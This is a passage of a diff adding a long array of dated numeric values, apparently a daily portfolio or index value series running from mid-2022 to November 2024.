[ + "2022-06-30", + 9410.388704237472 + ], + [ + "2022-07-01", + 9430.5556794351 + ], + [ + "2022-07-05", + 9487.202875061086 + ], + [ + "2022-07-06", + 9505.152700581735 + ], + [ + "2022-07-07", + 9525.651488885638 + ], + [ + "2022-07-08", + 9525.546455137797 + ], + [ + "2022-07-11", + 9514.963227177603 + ], + [ + "2022-07-12", + 9508.291386882367 + ], + [ + "2022-07-13", + 9518.643962277994 + ], + [ + "2022-07-14", + 9537.86467369202 + ], + [ + "2022-07-15", + 9581.878581052008 + ], + [ + "2022-07-18", + 9595.980672164116 + ], + [ + "2022-07-19", + 9615.701298445532 + ], + [ + "2022-07-20", + 9616.829255918963 + ], + [ + "2022-07-21", + 9617.957345705994 + ], + [ + "2022-07-22", + 9616.095567822147 + ], + [ + "2022-07-25", + 9630.743080896003 + ], + [ + "2022-07-26", + 9601.681430218572 + ], + [ + "2022-07-27", + 9649.711534377804 + ], + [ + "2022-07-28", + 9650.843481378217 + ], + [ + "2022-07-29", + 9648.985561160218 + ], + [ + "2022-08-01", + 9665.379364973347 + ], + [ + "2022-08-02", + 9669.540042010416 + ], + [ + "2022-08-03", + 9686.798908426701 + ], + [ + "2022-08-04", + 9687.935205913827 + ], + [ + "2022-08-05", + 9689.071636692868 + ], + [ + "2022-08-08", + 9687.21820077946 + ], + [ + "2022-08-09", + 9674.351899964235 + ], + [ + "2022-08-10", + 9709.700637458325 + ], + [ + "2022-08-11", + 9710.83962140332 + ], + [ + "2022-08-12", + 9711.978738955362 + ], + [ + "2022-08-15", + 9713.117990130122 + ], + [ + "2022-08-16", + 9714.257374943276 + ], + [ + "2022-08-17", + 9712.4068934105 + ], + [ + "2022-08-18", + 9722.819546095243 + ], + [ + "2022-08-19", + 9693.644278636364 + ], + [ + "2022-08-22", + 9630.257589670138 + ], + [ + "2022-08-23", + 9633.161197436668 + ], + [ + "2022-08-24", + 9644.894368915737 + ], + [ + "2022-08-25", + 9686.522290999359 + ], + [ + "2022-08-26", + 9566.109875818174 + ], + [ + "2022-08-29", + 9531.396821266813 + ], + [ + "2022-08-30", + 9509.200896269711 + ], + [ + "2022-08-31", + 9501.829508128652 + ], + [ + "2022-09-01", + 9508.44389818145 + ], + [ + "2022-09-02", + 9459.307421175248 + ], + [ + "2022-09-06", + 9462.143783299896 + ], + [ + "2022-09-07", + 9509.607019753346 + ], + [ + "2022-09-08", + 9528.874749040004 + ], + [ + "2022-09-09", + 9534.862478790626 + ], + [ + "2022-09-12", + 9556.657149582745 + ], + [ + "2022-09-13", + 9557.778180958234 + ], + [ + "2022-09-14", + 9558.899343834866 + ], + [ + "2022-09-15", + 9560.020638228068 + ], + [ + "2022-09-16", + 9558.152064153266 + ], + [ + "2022-09-19", + 9577.223481644476 + ], + [ + "2022-09-20", + 9578.346925527096 + ], + [ + "2022-09-21", + 9579.470501193855 + ], + [ + "2022-09-22", + 9580.594208660212 + ], + [ + "2022-09-23", + 9578.72804794163 + ], + [ + "2022-09-26", + 9591.001659943104 + ], + [ + "2022-09-27", + 9593.615876948244 + ], + [ + "2022-09-28", + 9594.74124371971 + ], + [ + "2022-09-29", + 9595.866742500879 + ], + [ + "2022-09-30", + 9594.002373307236 + ], + [ + "2022-10-03", + 9612.584354161952 + ], + [ + "2022-10-04", + 9613.711946006242 + ], + [ + "2022-10-05", + 9614.839670121244 + ], + [ + "2022-10-06", + 9615.967526522472 + ], + [ + "2022-10-07", + 9614.105515225445 + ], + [ + "2022-10-10", + 9618.9293823305 + ], + [ + "2022-10-11", + 9615.174101479473 + ], + [ + "2022-10-12", + 9620.846702799981 + ], + [ + "2022-10-13", + 9644.589896022111 + ], + [ + "2022-10-14", + 9642.731242235324 + ], + [ + "2022-10-17", + 9661.536003635343 + ], + [ + "2022-10-18", + 9662.669337689915 + ], + [ + "2022-10-19", + 9663.80280468878 + ], + [ + "2022-10-20", + 9664.936404647533 + ], + [ + "2022-10-21", + 9663.080137581772 + ], + [ + "2022-10-24", + 9681.56236419792 + ], + [ + "2022-10-25", + 9682.69804741896 + ], + [ + "2022-10-26", + 9683.83386385986 + ], + [ + "2022-10-27", + 9684.969813536247 + ], + [ + "2022-10-28", + 9683.115896463749 + ], + [ + "2022-10-31", + 9687.200255176449 + ], + [ + "2022-11-01", + 9683.054635731894 + ], + [ + "2022-11-02", + 9616.367062290481 + ], + [ + "2022-11-03", + 9570.61538190108 + ], + [ + "2022-11-04", + 9606.929652724251 + ], + [ + "2022-11-07", + 9634.036480033674 + ], + [ + "2022-11-08", + 9648.298500090821 + ], + [ + "2022-11-09", + 9623.24624060549 + ], + [ + "2022-11-10", + 9672.344097103203 + ], + [ + "2022-11-11", + 9670.875045579578 + ], + [ + "2022-11-14", + 9681.774905747498 + ], + [ + "2022-11-15", + 9700.10238158467 + ], + [ + "2022-11-16", + 9701.240239618604 + ], + [ + "2022-11-17", + 9702.378231127512 + ], + [ + "2022-11-18", + 9700.52635612705 + ], + [ + "2022-11-21", + 9707.392927751402 + ], + [ + "2022-11-22", + 9726.184854531715 + ], + [ + "2022-11-23", + 9727.325772136592 + ], + [ + "2022-11-25", + 9725.476823575342 + ], + [ + "2022-11-28", + 9727.395521075574 + ], + [ + "2022-11-29", + 9724.31849348587 + ], + [ + "2022-11-30", + 9764.260578776213 + ], + [ + "2022-12-01", + 9765.40596280495 + ], + [ + "2022-12-02", + 9763.56148119149 + ], + [ + "2022-12-05", + 9759.066663006835 + ], + [ + "2022-12-06", + 9728.762142695095 + ], + [ + "2022-12-07", + 9728.513375888375 + ], + [ + "2022-12-08", + 9764.59821891289 + ], + [ + "2022-12-09", + 9755.976406777456 + ], + [ + "2022-12-12", + 9786.996100356946 + ], + [ + "2022-12-13", + 9803.138913705661 + ], + [ + "2022-12-14", + 9802.05819090661 + ], + [ + "2022-12-15", + 9731.253958668765 + ], + [ + "2022-12-16", + 9718.964155293159 + ], + [ + "2022-12-19", + 9694.924811936595 + ], + [ + "2022-12-20", + 9697.35219802639 + ], + [ + "2022-12-21", + 9720.235786991765 + ], + [ + "2022-12-22", + 9688.842256609081 + ], + [ + "2022-12-23", + 9695.346996744105 + ], + [ + "2022-12-27", + 9666.287115303878 + ], + [ + "2022-12-28", + 9650.286238751354 + ], + [ + "2022-12-29", + 9691.393610488729 + ], + [ + "2022-12-30", + 9695.734668188532 + ], + [ + "2023-01-03", + 9702.108431207493 + ], + [ + "2023-01-04", + 9712.595180251457 + ], + [ + "2023-01-05", + 9693.61178688149 + ], + [ + "2023-01-06", + 9728.435849736388 + ], + [ + "2023-01-09", + 9747.501870391368 + ], + [ + "2023-01-10", + 9751.732481408528 + ], + [ + "2023-01-11", + 9752.876395844916 + ], + [ + "2023-01-12", + 9754.020444466718 + ], + [ + "2023-01-13", + 9755.16462728967 + ], + [ + "2023-01-17", + 9756.308944329518 + ], + [ + "2023-01-18", + 9757.453395602004 + ], + [ + "2023-01-19", + 9758.597981122875 + ], + [ + "2023-01-20", + 9759.742700907878 + ], + [ + "2023-01-23", + 9760.887554972764 + ], + [ + "2023-01-24", + 9762.032543333282 + ], + [ + "2023-01-25", + 9763.177666005187 + ], + [ + "2023-01-26", + 9764.322923004236 + ], + [ + "2023-01-27", + 9765.468314346183 + ], + [ + "2023-01-30", + 9766.613840046788 + ], + [ + "2023-01-31", + 9767.759500121812 + ], + [ + "2023-02-01", + 9768.905294587019 + ], + [ + "2023-02-02", + 9770.051223458171 + ], + [ + "2023-02-03", + 9771.197286751036 + ], + [ + "2023-02-06", + 9772.34348448138 + ], + [ + "2023-02-07", + 9773.489816664976 + ], + [ + "2023-02-08", + 9771.646283317594 + ], + [ + "2023-02-09", + 9766.081389220253 + ], + [ + "2023-02-10", + 9761.739896450164 + ], + [ + "2023-02-13", + 9792.387497667878 + ], + [ + "2023-02-14", + 9793.53618108866 + ], + [ + "2023-02-15", + 9791.694999254274 + ], + [ + "2023-02-16", + 9768.737739025448 + ], + [ + "2023-02-17", + 9763.756998900615 + ], + [ + "2023-02-21", + 9721.34229199569 + ], + [ + "2023-02-22", + 9720.938556632773 + ], + [ + "2023-02-23", + 9739.23778134251 + ], + [ + "2023-02-24", + 9714.16760679449 + ], + [ + "2023-02-27", + 9745.354600800607 + ], + [ + "2023-02-28", + 9745.010439572916 + ], + [ + "2023-03-01", + 9735.265756676612 + ], + [ + "2023-03-02", + 9757.144676443162 + ], + [ + "2023-03-03", + 9794.46508598373 + ], + [ + "2023-03-06", + 9810.017788898496 + ], + [ + "2023-03-07", + 9807.746047750341 + ], + [ + "2023-03-08", + 9822.932110027972 + ], + [ + "2023-03-09", + 9789.751278472646 + ], + [ + "2023-03-10", + 9749.682759573261 + ], + [ + "2023-03-13", + 9770.993237612896 + ], + [ + "2023-03-14", + 9794.93513924121 + ], + [ + "2023-03-15", + 9799.82543957439 + ], + [ + "2023-03-16", + 9802.358123530757 + ], + [ + "2023-03-17", + 9803.472674665023 + ], + [ + "2023-03-20", + 9804.622658418235 + ], + [ + "2023-03-21", + 9805.772777068813 + ], + [ + "2023-03-22", + 9806.923030632579 + ], + [ + "2023-03-23", + 9808.073419125361 + ], + [ + "2023-03-24", + 9809.223942562985 + ], + [ + "2023-03-27", + 9810.374600961282 + ], + [ + "2023-03-28", + 9811.525394336082 + ], + [ + "2023-03-29", + 9812.676322703219 + ], + [ + "2023-03-30", + 9813.827386078527 + ], + [ + "2023-03-31", + 9814.978584477843 + ], + [ + "2023-04-03", + 9816.12991791701 + ], + [ + "2023-04-04", + 9817.281386411862 + ], + [ + "2023-04-05", + 9818.432989978246 + ], + [ + "2023-04-06", + 9819.584728632006 + ], + [ + "2023-04-10", + 9820.736602388986 + ], + [ + "2023-04-11", + 9821.888611265036 + ], + [ + "2023-04-12", + 9823.040755276006 + ], + [ + "2023-04-13", + 9824.193034437747 + ], + [ + "2023-04-14", + 9825.345448766113 + ], + [ + "2023-04-17", + 9826.49799827696 + ], + [ + "2023-04-18", + 9827.650682986145 + ], + [ + "2023-04-19", + 9828.803502909526 + ], + [ + "2023-04-20", + 9829.956458062967 + ], + [ + "2023-04-21", + 9831.10954846233 + ], + [ + "2023-04-24", + 9832.262774123477 + ], + [ + "2023-04-25", + 9833.416135062278 + ], + [ + "2023-04-26", + 9834.5696312946 + ], + [ + "2023-04-27", + 9835.723262836314 + ], + [ + "2023-04-28", + 9836.877029703293 + ], + [ + "2023-05-01", + 9838.030931911411 + ], + [ + "2023-05-02", + 9839.184969476542 + ], + [ + "2023-05-03", + 9840.339142414567 + ], + [ + "2023-05-04", + 9841.493450741362 + ], + [ + "2023-05-05", + 9842.647894472811 + ], + [ + "2023-05-08", + 9843.802473624797 + ], + [ + "2023-05-09", + 9844.957188213206 + ], + [ + "2023-05-10", + 9846.112038253925 + ], + [ + "2023-05-11", + 9847.267023762843 + ], + [ + "2023-05-12", + 9848.42214475585 + ], + [ + "2023-05-15", + 9849.57740124884 + ], + [ + "2023-05-16", + 9850.732793257706 + ], + [ + "2023-05-17", + 9851.888320798347 + ], + [ + "2023-05-18", + 9853.043983886659 + ], + [ + "2023-05-19", + 9854.199782538542 + ], + [ + "2023-05-22", + 9855.3557167699 + ], + [ + "2023-05-23", + 9856.511786596637 + ], + [ + "2023-05-24", + 9857.667992034658 + ], + [ + "2023-05-25", + 9858.82433309987 + ], + [ + "2023-05-26", + 9859.980809808185 + ], + [ + "2023-05-30", + 9861.137422175512 + ], + [ + "2023-05-31", + 9862.294170217765 + ], + [ + "2023-06-01", + 9863.45105395086 + ], + [ + "2023-06-02", + 9864.608073390711 + ], + [ + "2023-06-05", + 9865.76522855324 + ], + [ + "2023-06-06", + 9866.922519454369 + ], + [ + "2023-06-07", + 9868.079946110018 + ], + [ + "2023-06-08", + 9869.23750853611 + ], + [ + "2023-06-09", + 9870.395206748577 + ], + [ + "2023-06-12", + 9871.553040763343 + ], + [ + "2023-06-13", + 9872.711010596338 + ], + [ + "2023-06-14", + 9873.869116263495 + ], + [ + "2023-06-15", + 9875.027357780747 + ], + [ + "2023-06-16", + 9876.185735164032 + ], + [ + "2023-06-20", + 9877.344248429286 + ], + [ + "2023-06-21", + 9878.502897592449 + ], + [ + "2023-06-22", + 9879.66168266946 + ], + [ + "2023-06-23", + 9880.820603676266 + ], + [ + "2023-06-26", + 9881.97966062881 + ], + [ + "2023-06-27", + 9883.138853543038 + ], + [ + "2023-06-28", + 9884.2981824349 + ], + [ + "2023-06-29", + 9885.457647320347 + ], + [ + "2023-06-30", + 9886.61724821533 + ], + [ + "2023-07-03", + 9887.776985135806 + ], + [ + "2023-07-05", + 9888.93685809773 + ], + [ + "2023-07-06", + 9890.09686711706 + ], + [ + "2023-07-07", + 9891.257012209755 + ], + [ + "2023-07-10", + 9892.417293391778 + ], + [ + "2023-07-11", + 9893.577710679094 + ], + [ + "2023-07-12", + 9894.738264087666 + ], + [ + "2023-07-13", + 9895.898953633463 + ], + [ + "2023-07-14", + 9897.059779332454 + ], + [ + "2023-07-17", + 9898.220741200612 + ], + [ + "2023-07-18", + 9899.381839253909 + ], + [ + "2023-07-19", + 9900.54307350832 + ], + [ + "2023-07-20", + 9901.70444397982 + ], + [ + "2023-07-21", + 9902.865950684389 + ], + [ + "2023-07-24", + 9904.02759363801 + ], + [ + "2023-07-25", + 9905.189372856663 + ], + [ + "2023-07-26", + 9906.351288356333 + ], + [ + "2023-07-27", + 9907.513340153006 + ], + [ + "2023-07-28", + 9908.67552826267 + ], + [ + "2023-07-31", + 9909.837852701316 + ], + [ + "2023-08-01", + 9911.000313484934 + ], + [ + "2023-08-02", + 9912.16291062952 + ], + [ + "2023-08-03", + 9913.32564415107 + ], + [ + "2023-08-04", + 9914.488514065579 + ], + [ + "2023-08-07", + 9915.651520389049 + ], + [ + "2023-08-08", + 9916.814663137478 + ], + [ + "2023-08-09", + 9917.977942326872 + ], + [ + "2023-08-10", + 9919.141357973234 + ], + [ + "2023-08-11", + 9920.304910092573 + ], + [ + "2023-08-14", + 9921.468598700896 + ], + [ + "2023-08-15", + 9922.632423814215 + ], + [ + "2023-08-16", + 9923.796385448542 + ], + [ + "2023-08-17", + 9924.960483619892 + ], + [ + "2023-08-18", + 9926.124718344281 + ], + [ + "2023-08-21", + 9927.289089637727 + ], + [ + "2023-08-22", + 9928.453597516249 + ], + [ + "2023-08-23", + 9929.618241995871 + ], + [ + "2023-08-24", + 9930.783023092616 + ], + [ + "2023-08-25", + 9931.947940822509 + ], + [ + "2023-08-28", + 9933.112995201578 + ], + [ + "2023-08-29", + 9934.278186245852 + ], + [ + "2023-08-30", + 9935.443513971364 + ], + [ + "2023-08-31", + 9936.608978394146 + ], + [ + "2023-09-01", + 9937.774579530233 + ], + [ + "2023-09-05", + 9938.940317395662 + ], + [ + "2023-09-06", + 9940.106192006471 + ], + [ + "2023-09-07", + 9941.272203378703 + ], + [ + "2023-09-08", + 9942.438351528399 + ], + [ + "2023-09-11", + 9943.604636471604 + ], + [ + "2023-09-12", + 9944.771058224364 + ], + [ + "2023-09-13", + 9945.937616802727 + ], + [ + "2023-09-14", + 9947.104312222744 + ], + [ + "2023-09-15", + 9948.271144500466 + ], + [ + "2023-09-18", + 9949.438113651948 + ], + [ + "2023-09-19", + 9950.605219693245 + ], + [ + "2023-09-20", + 9951.772462640416 + ], + [ + "2023-09-21", + 9952.939842509519 + ], + [ + "2023-09-22", + 9954.107359316617 + ], + [ + "2023-09-25", + 9955.275013077771 + ], + [ + "2023-09-26", + 9956.442803809048 + ], + [ + "2023-09-27", + 9957.610731526514 + ], + [ + "2023-09-28", + 9958.77879624624 + ], + [ + "2023-09-29", + 9959.946997984296 + ], + [ + "2023-10-02", + 9961.115336756753 + ], + [ + "2023-10-03", + 9962.283812579688 + ], + [ + "2023-10-04", + 9963.452425469177 + ], + [ + "2023-10-05", + 9964.621175441298 + ], + [ + "2023-10-06", + 9965.790062512131 + ], + [ + "2023-10-09", + 9966.959086697758 + ], + [ + "2023-10-10", + 9968.128248014264 + ], + [ + "2023-10-11", + 9969.297546477734 + ], + [ + "2023-10-12", + 9970.466982104255 + ], + [ + "2023-10-13", + 9971.63655490992 + ], + [ + "2023-10-16", + 9972.806264910818 + ], + [ + "2023-10-17", + 9973.976112123044 + ], + [ + "2023-10-18", + 9975.146096562692 + ], + [ + "2023-10-19", + 9976.31621824586 + ], + [ + "2023-10-20", + 9977.486477188648 + ], + [ + "2023-10-23", + 9978.656873407155 + ], + [ + "2023-10-24", + 9979.827406917486 + ], + [ + "2023-10-25", + 9980.998077735743 + ], + [ + "2023-10-26", + 9982.168885878036 + ], + [ + "2023-10-27", + 9983.339831360472 + ], + [ + "2023-10-30", + 9981.520914199162 + ], + [ + "2023-10-31", + 9991.867296689887 + ], + [ + "2023-11-01", + 9999.490792777056 + ], + [ + "2023-11-02", + 10000.663770183502 + ], + [ + "2023-11-03", + 10001.836885184555 + ], + [ + "2023-11-06", + 10000.020137796355 + ], + [ + "2023-11-07", + 10011.02436427423 + ], + [ + "2023-11-08", + 10012.198694611447 + ], + [ + "2023-11-09", + 10013.373162701973 + ], + [ + "2023-11-10", + 10014.547768561968 + ], + [ + "2023-11-13", + 10012.732512207593 + ], + [ + "2023-11-14", + 10031.644475488612 + ], + [ + "2023-11-15", + 10032.821224641453 + ], + [ + "2023-11-16", + 10033.99811183134 + ], + [ + "2023-11-17", + 10035.175137074466 + ], + [ + "2023-11-20", + 10036.352300387023 + ], + [ + "2023-11-21", + 10037.529601785209 + ], + [ + "2023-11-22", + 10038.70704128522 + ], + [ + "2023-11-24", + 10039.88461890326 + ], + [ + "2023-11-27", + 10041.062334655526 + ], + [ + "2023-11-28", + 10042.240188558224 + ], + [ + "2023-11-29", + 10043.41818062756 + ], + [ + "2023-11-30", + 10044.596310879739 + ], + [ + "2023-12-01", + 10045.774579330973 + ], + [ + "2023-12-04", + 10046.952985997472 + ], + [ + "2023-12-05", + 10048.131530895449 + ], + [ + "2023-12-06", + 10049.31021404112 + ], + [ + "2023-12-07", + 10050.4890354507 + ], + [ + "2023-12-08", + 10051.667995140411 + ], + [ + "2023-12-11", + 10052.847093126473 + ], + [ + "2023-12-12", + 10054.026329425107 + ], + [ + "2023-12-13", + 10055.205704052538 + ], + [ + "2023-12-14", + 10056.385217024992 + ], + [ + "2023-12-15", + 10057.564868358699 + ], + [ + "2023-12-18", + 10058.744658069889 + ], + [ + "2023-12-19", + 10059.924586174793 + ], + [ + "2023-12-20", + 10061.104652689646 + ], + [ + "2023-12-21", + 10062.284857630684 + ], + [ + "2023-12-22", + 10063.465201014144 + ], + [ + "2023-12-26", + 10064.645682856266 + ], + [ + "2023-12-27", + 10065.826303173293 + ], + [ + "2023-12-28", + 10067.007061981469 + ], + [ + "2023-12-29", + 10068.187959297036 + ], + [ + "2024-01-02", + 10066.378995136243 + ], + [ + "2024-01-03", + 10053.688428899717 + ], + [ + "2024-01-04", + 10045.177656043019 + ], + [ + "2024-01-05", + 10055.20752335682 + ], + [ + "2024-01-08", + 10080.752546396434 + ], + [ + "2024-01-09", + 10078.945056108372 + ], + [ + "2024-01-10", + 10086.088658631043 + ], + [ + "2024-01-11", + 10087.271794288763 + ], + [ + "2024-01-12", + 10088.45506873269 + ], + [ + "2024-01-16", + 10086.648481979104 + ], + [ + "2024-01-17", + 10082.586874128727 + ], + [ + "2024-01-18", + 10095.502694181734 + ], + [ + "2024-01-19", + 10096.686934140787 + ], + [ + "2024-01-22", + 10097.871313015587 + ], + [ + "2024-01-23", + 10099.055830822426 + ], + [ + "2024-01-24", + 10100.240487577603 + ], + [ + "2024-01-25", + 10101.425283297416 + ], + [ + "2024-01-26", + 10102.610217998168 + ], + [ + "2024-01-29", + 10103.79529169616 + ], + [ + "2024-01-30", + 10104.9805044077 + ], + [ + "2024-01-31", + 10103.175856149091 + ], + [ + "2024-02-01", + 10115.96451938996 + ], + [ + "2024-02-02", + 10117.151159597102 + ], + [ + "2024-02-05", + 10118.337939001547 + ], + [ + "2024-02-06", + 10119.524857619625 + ], + [ + "2024-02-07", + 10120.711915467664 + ], + [ + "2024-02-08", + 10121.899112561996 + ], + [ + "2024-02-09", + 10123.086448918957 + ], + [ + "2024-02-12", + 10124.273924554882 + ], + [ + "2024-02-13", + 10122.47153948611 + ], + [ + "2024-02-14", + 10136.854467066558 + ], + [ + "2024-02-15", + 10138.043557742145 + ], + [ + "2024-02-16", + 10139.232787902483 + ], + [ + "2024-02-20", + 10137.432157563935 + ], + [ + "2024-02-21", + 10135.688011449945 + ], + [ + "2024-02-22", + 10154.936626023959 + ], + [ + "2024-02-23", + 10156.127837803944 + ], + [ + "2024-02-26", + 10157.319189317495 + ], + [ + "2024-02-27", + 10155.520680581005 + ], + [ + "2024-02-28", + 10151.214019500523 + ], + [ + "2024-02-29", + 10174.131797461137 + ], + [ + "2024-03-01", + 10175.32526090602 + ], + [ + "2024-03-04", + 10176.518864348598 + ], + [ + "2024-03-05", + 10174.722607805294 + ], + [ + "2024-03-06", + 10189.401859656584 + ], + [ + "2024-03-07", + 10200.32132217708 + ], + [ + "2024-03-08", + 10201.517857750476 + ], + [ + "2024-03-11", + 10202.714533681938 + ], + [ + "2024-03-12", + 10200.921349987932 + ], + [ + "2024-03-13", + 10193.194713694662 + ], + [ + "2024-03-14", + 10195.392619930128 + ], + [ + "2024-03-15", + 10157.902200802588 + ], + [ + "2024-03-18", + 10225.862350471272 + ], + [ + "2024-03-19", + 10224.071882102142 + ], + [ + "2024-03-20", + 10242.849939593567 + ], + [ + "2024-03-21", + 10244.05146393173 + ], + [ + "2024-03-22", + 10245.25312921316 + ], + [ + "2024-03-25", + 10246.45493545439 + ], + [ + "2024-03-26", + 10244.666882671956 + ], + [ + "2024-03-27", + 10254.82493689883 + ], + [ + "2024-03-28", + 10257.847647367498 + ], + [ + "2024-04-01", + 10269.504429482186 + ], + [ + "2024-04-02", + 10267.719080491002 + ], + [ + "2024-04-03", + 10276.60424248378 + ], + [ + "2024-04-04", + 10277.80972632703 + ], + [ + "2024-04-05", + 10279.015351578013 + ], + [ + "2024-04-08", + 10280.221118253314 + ], + [ + "2024-04-09", + 10278.437026369524 + ], + [ + "2024-04-10", + 10271.04379856284 + ], + [ + "2024-04-11", + 10287.294895150982 + ], + [ + "2024-04-12", + 10288.501633047494 + ], + [ + "2024-04-15", + 10289.708512498843 + ], + [ + "2024-04-16", + 10287.925533521633 + ], + [ + "2024-04-17", + 10266.169179440447 + ], + [ + "2024-04-18", + 10257.965648363477 + ], + [ + "2024-04-19", + 10155.144947569357 + ], + [ + "2024-04-22", + 10230.704262204668 + ], + [ + "2024-04-23", + 10305.526180211962 + ], + [ + "2024-04-24", + 10315.301997878822 + ], + [ + "2024-04-25", + 10313.610915998384 + ], + [ + "2024-04-26", + 10327.749304877223 + ], + [ + "2024-04-29", + 10328.960788226237 + ], + [ + "2024-04-30", + 10327.182413686747 + ], + [ + "2024-05-01", + 10319.1243378099 + ], + [ + "2024-05-02", + 10343.773625425569 + ], + [ + "2024-05-03", + 10344.986988486893 + ], + [ + "2024-05-06", + 10346.200493880211 + ], + [ + "2024-05-07", + 10344.42414162222 + ], + [ + "2024-05-08", + 10351.723640882125 + ], + [ + "2024-05-09", + 10365.534465998931 + ], + [ + "2024-05-10", + 10374.913811195069 + ], + [ + "2024-05-13", + 10376.130827115834 + ], + [ + "2024-05-14", + 10374.357985797087 + ], + [ + "2024-05-15", + 10396.004840094076 + ], + [ + "2024-05-16", + 10397.22433007086 + ], + [ + "2024-05-17", + 10398.443963098347 + ], + [ + "2024-05-20", + 10399.663739193318 + ], + [ + "2024-05-21", + 10400.883658372555 + ], + [ + "2024-05-22", + 10402.103720652842 + ], + [ + "2024-05-23", + 10403.323926050965 + ], + [ + "2024-05-24", + 10404.544274583714 + ], + [ + "2024-05-28", + 10405.764766267877 + ], + [ + "2024-05-29", + 10406.985401120248 + ], + [ + "2024-05-30", + 10405.21617915762 + ], + [ + "2024-05-31", + 10409.765859785684 + ], + [ + "2024-06-03", + 10416.195758781148 + ], + [ + "2024-06-04", + 10417.41761722768 + ], + [ + "2024-06-05", + 10418.639619002746 + ], + [ + "2024-06-06", + 10419.861764123158 + ], + [ + "2024-06-07", + 10421.08405260573 + ], + [ + "2024-06-10", + 10422.306484467283 + ], + [ + "2024-06-11", + 10423.529059724631 + ], + [ + "2024-06-12", + 10424.751778394599 + ], + [ + "2024-06-13", + 10425.974640494007 + ], + [ + "2024-06-14", + 10427.19764603968 + ], + [ + "2024-06-17", + 10428.420795048447 + ], + [ + "2024-06-18", + 10429.644087537135 + ], + [ + "2024-06-20", + 10430.867523522575 + ], + [ + "2024-06-21", + 10432.0911030216 + ], + [ + "2024-06-24", + 10430.324826051043 + ], + [ + "2024-06-25", + 10441.18347016044 + ], + [ + "2024-06-26", + 10442.408259758316 + ], + [ + "2024-06-27", + 10443.633193028561 + ], + [ + "2024-06-28", + 10444.858269988028 + ], + [ + "2024-07-01", + 10446.083490653573 + ], + [ + "2024-07-02", + 10447.30885504205 + ], + [ + "2024-07-03", + 10448.534363170324 + ], + [ + "2024-07-05", + 10449.76001505525 + ], + [ + "2024-07-08", + 10450.985810713695 + ], + [ + "2024-07-09", + 10452.211750162523 + ], + [ + "2024-07-10", + 10453.437833418602 + ], + [ + "2024-07-11", + 10451.6740604988 + ], + [ + "2024-07-12", + 10464.071869335592 + ], + [ + "2024-07-15", + 10465.299343827695 + ], + [ + "2024-07-16", + 10466.526962307116 + ], + [ + "2024-07-17", + 10467.754724790744 + ], + [ + "2024-07-18", + 10465.99263129547 + ], + [ + "2024-07-19", + 10448.720950178911 + ], + [ + "2024-07-22", + 10493.78554981357 + ], + [ + "2024-07-23", + 10495.016509830746 + ], + [ + "2024-07-24", + 10496.247614244103 + ], + [ + "2024-07-25", + 10494.488863070577 + ], + [ + "2024-07-26", + 10519.386713649685 + ], + [ + "2024-07-29", + 10537.553814203267 + ], + [ + "2024-07-30", + 10538.789908400404 + ], + [ + "2024-07-31", + 10540.02614759598 + ], + [ + "2024-08-01", + 10538.272531807002 + ], + [ + "2024-08-02", + 10457.143708597921 + ], + [ + "2024-08-05", + 10307.736715256062 + ], + [ + "2024-08-06", + 10374.403307152614 + ], + [ + "2024-08-07", + 10300.283871616572 + ], + [ + "2024-08-08", + 10538.26091452885 + ], + [ + "2024-08-09", + 10571.194421589587 + ], + [ + "2024-08-12", + 10625.908050980563 + ], + [ + "2024-08-13", + 10708.17009581565 + ], + [ + "2024-08-14", + 10727.093424909232 + ], + [ + "2024-08-15", + 10731.648278809143 + ], + [ + "2024-08-16", + 10749.213312132968 + ], + [ + "2024-08-19", + 10815.284958436825 + ], + [ + "2024-08-20", + 10816.553631528628 + ], + [ + "2024-08-21", + 10817.822453440496 + ], + [ + "2024-08-22", + 10816.101424189887 + ], + [ + "2024-08-23", + 10854.415895002645 + ], + [ + "2024-08-26", + 10865.893586006654 + ], + [ + "2024-08-27", + 10867.168195678423 + ], + [ + "2024-08-28", + 10868.44295486664 + ], + [ + "2024-08-29", + 10866.727863588843 + ], + [ + "2024-08-30", + 10904.960811233133 + ], + [ + "2024-09-03", + 10906.24000363551 + ], + [ + "2024-09-04", + 10907.519346091907 + ], + [ + "2024-09-05", + 10905.808838619925 + ], + [ + "2024-09-06", + 10816.214506981914 + ], + [ + "2024-09-09", + 10900.559053620627 + ], + [ + "2024-09-10", + 10937.372450149669 + ], + [ + "2024-09-11", + 10938.655444557662 + ], + [ + "2024-09-12", + 10936.948589465665 + ], + [ + "2024-09-13", + 10964.18781485548 + ], + [ + "2024-09-16", + 10978.10604415466 + ], + [ + "2024-09-17", + 10979.393816764508 + ], + [ + "2024-09-18", + 10980.681740434866 + ], + [ + "2024-09-19", + 10978.979815183453 + ], + [ + "2024-09-20", + 10987.33384295166 + ], + [ + "2024-09-23", + 11020.882788355802 + ], + [ + "2024-09-24", + 11022.17557883661 + ], + [ + "2024-09-25", + 11023.468520966542 + ], + [ + "2024-09-26", + 11021.771614763387 + ], + [ + "2024-09-27", + 11014.082005543543 + ], + [ + "2024-09-30", + 11051.198120473367 + ], + [ + "2024-10-01", + 11052.49446705522 + ], + [ + "2024-10-02", + 11053.79096570334 + ], + [ + "2024-10-03", + 11052.097616435567 + ], + [ + "2024-10-04", + 11082.965805053942 + ], + [ + "2024-10-07", + 11084.265878103175 + ], + [ + "2024-10-08", + 11085.566103655805 + ], + [ + "2024-10-09", + 11086.866481729721 + ], + [ + "2024-10-10", + 11085.177012342816 + ], + [ + "2024-10-11", + 11092.23067368054 + ], + [ + "2024-10-14", + 11105.88211768337 + ], + [ + "2024-10-15", + 11107.184878901182 + ], + [ + "2024-10-16", + 11108.487792937723 + ], + [ + "2024-10-17", + 11109.790859810919 + ], + [ + "2024-10-18", + 11111.0940795387 + ], + [ + "2024-10-21", + 11112.397452138994 + ], + [ + "2024-10-22", + 11113.700977629735 + ], + [ + "2024-10-23", + 11112.014656028856 + ], + [ + "2024-10-24", + 11122.61550426564 + ], + [ + "2024-10-25", + 11123.920228371842 + ], + [ + "2024-10-28", + 11125.225105527028 + ], + [ + "2024-10-29", + 11126.53013574915 + ], + [ + "2024-10-30", + 11127.835319056165 + ], + [ + "2024-10-31", + 11126.150655466026 + ], + [ + "2024-11-01", + 11141.277366772176 + ], + [ + "2024-11-04", + 11142.584279984158 + ], + [ + "2024-11-05", + 11143.891346501912 + ], + [ + "2024-11-06", + 11145.198566343424 + ], + [ + "2024-11-07", + 11146.505939526678 + ], + [ + "2024-11-08", + 11147.813466069661 + ], + [ + "2024-11-11", + 11149.121145990364 + ], + [ + "2024-11-12", + 11150.428979306778 + ], + [ + "2024-11-13", + 11151.736966036899 + ], + [ + "2024-11-14", + 11150.055106198719 + ], + [ + "2024-11-15", + 11041.074513605261 + ], 